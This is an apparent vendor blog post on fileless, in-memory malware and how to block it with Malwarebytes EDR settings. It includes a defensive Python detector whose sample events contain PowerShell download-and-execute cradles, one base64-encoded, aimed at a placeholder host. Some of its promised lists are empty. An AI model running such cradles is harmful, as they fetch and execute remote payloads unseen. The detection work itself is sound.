When you hear about malware, there's a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks, and while they can be bad, they're nothing compared to their fileless cousins.
As the name suggests, fileless attacks don't rely on traditional executable files to get the job done but rather on **in-memory execution**, which helps them evade detection by conventional security solutions.
In this post, we'll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.
In contrast to file-based attacks, which execute a payload stored on the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly in memory instead of from the hard drive has several benefits, such as:
If you read our article on LOTL attacks, you may be confused: Aren't fileless attacks and LOTL attacks the same thing? Well, yes and no.
LOTL attacks are anytime an attacker leverages legitimate tools to evade detection, steal data, and more, while fileless attacks refer purely to executing code directly into memory. While both types of attacks often overlap, they are not synonymous.
Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute a payload in memory, but they can also do so without leveraging a legitimate system tool or process at all.
Figure: PowerShell script extracted from a Microsoft Word document. If macros are enabled, the code executes in memory as soon as the document is opened.
For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).
On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but it doesn't qualify as LOTL since it doesn't use a legitimate system tool or process.
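To show the defender's side of the PowerShell case above, here is an added example (not code from the original post or from Malwarebytes) that scores constructed process events for the in-memory download-and-execute pattern, including the script hidden behind an encoded command. The event format, the indicator weights and the Office-parent rule are assumptions for illustration.

```python
import base64
import re
from collections import namedtuple
Finding = namedtuple("Finding", "parent process score reasons")

# Constructed sample telemetry (not from the original post), one event per line in
# the assumed format parent|process|command line; the -enc event is built from a known script.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16le")).decode()
SAMPLE_EVENTS = "\n".join([
    "WINWORD.EXE|powershell.exe|powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\"",
    "explorer.exe|powershell.exe|powershell -NoProfile -File C:\\scripts\\backup.ps1",
    f"cmd.exe|powershell.exe|powershell -ep bypass -enc {ENCODED}",
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\a\\notes.txt",
])

# Weighted indicators: none alone proves an attack; download + in-memory execution + hiding does.
INDICATORS = [
    (r"(?i)\bIEX\b|Invoke-Expression", 3, "in-memory execution (IEX)"),
    (r"(?i)DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest|\bIWR\b", 3, "payload download"),
    (r"(?i)\s-e(nc|ncodedcommand)?\s", 2, "encoded command"),
    (r"(?i)\s-w(indowstyle)?\s+hidden", 1, "hidden window"),
    (r"(?i)\s-(nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b", 1, "profile/policy bypass"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
ENC_ARG = re.compile(r"(?i)\s-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand, or '' if absent or invalid."""
    m = ENC_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le", errors="ignore") if m else ""
    except ValueError:  # binascii.Error (bad base64) is a ValueError subclass
        return ""

def score_event(parent: str, process: str, cmdline: str) -> Finding:
    score, reasons = 0, []
    if process.lower() in SCRIPT_HOSTS:
        text = cmdline + " " + decode_encoded_command(cmdline)  # scan the decoded script too
        for pattern, weight, label in INDICATORS:
            if re.search(pattern, text):
                score, reasons = score + weight, reasons + [label]
        if parent.lower() in OFFICE_PARENTS:  # an Office app spawning a script host
            score, reasons = score + 3, reasons + [f"script host spawned by {parent}"]
    return Finding(parent, process, score, tuple(reasons))

def find_suspicious(events: str, threshold: int = 4) -> list:
    """Findings at or above threshold, highest score first."""
    found = [score_event(*line.split("|", 2)) for line in events.splitlines() if line]
    return sorted((f for f in found if f.score >= threshold), key=lambda f: -f.score)
```

Running `find_suspicious(SAMPLE_EVENTS)` flags the Word-spawned download-and-execute and the encoded variant while leaving the scheduled backup script alone; in practice the weights would be tuned against your own baseline.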
Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.
Below are five common techniques used in fileless attacks:
Note that in each of these instances, fileless attacks often rely on exploiting vulnerabilities in system components (such as Office or web browsers) to execute their code.
Prevention Method | Description
---|---
Keep software and systems updated | Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers.
Regularly review security logs |
Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.
To configure Exploit Protection Advanced settings, follow these steps:
Go to Configure > Policies in Nebula.
Select a policy and navigate to **Protection settings > Advanced settings > Anti-exploit settings**.
Figure: Exploit Protection settings in a policy in Malwarebytes EDR.
Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:
Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.
To enable Suspicious Activity Monitoring in your policy:
Figure: Suspicious Activity Monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.
Advanced Settings offer additional options for activity monitoring. To configure these settings:
Flight Recorder Search makes all collected endpoint events available through its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring process, registry, file system, and network activity on the endpoint.
Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection.